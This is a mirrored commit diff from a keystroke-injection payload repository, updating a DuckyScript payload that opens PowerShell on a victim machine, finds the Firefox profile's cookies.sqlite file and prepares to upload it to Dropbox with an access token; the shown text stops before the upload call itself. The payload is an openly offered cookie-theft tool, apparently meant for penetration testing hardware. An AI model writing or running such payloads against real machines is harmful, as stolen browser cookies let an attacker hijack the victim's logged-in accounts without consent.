hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update payload.txt

pull/156/head
Kalani Helekunihi 2023-06-12 14:29:47 -04:00 committed by GitHub
parent 8f68977476
commit 30cf14a1c0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
View File

@ -16,31 +16,24 @@ REM - Firefox must be installed
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
DEFINE DROPBOX_ACCESS_TOKEN "example" DEFINE DROPBOX_ACCESS_TOKEN "example"
DEFAULT_DELAY 500
DELAY 1000
GUI r GUI r
DELAY 500 STRINGLN powershell
STRING powershell
DELAY 500
ENTER
DELAY 2000 DELAY 2000
REM Get cookies DB path REM Get cookies DB path
STRINGLN STRINGLN_BLOCK
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
END_STRINGLN END_STRINGLN
REM Setting about exfiltration REM Setting about exfiltration
STRING $accessToken = STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
STRING DROPBOX_ACCESS_TOKEN
ENTER ENTER
STRINGLN STRINGLN_BLOCK
$uploadUrl = "https://content.dropboxapi.com/2/files/upload" $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite" $dropboxFilePath = "/cookies_exported.sqlite"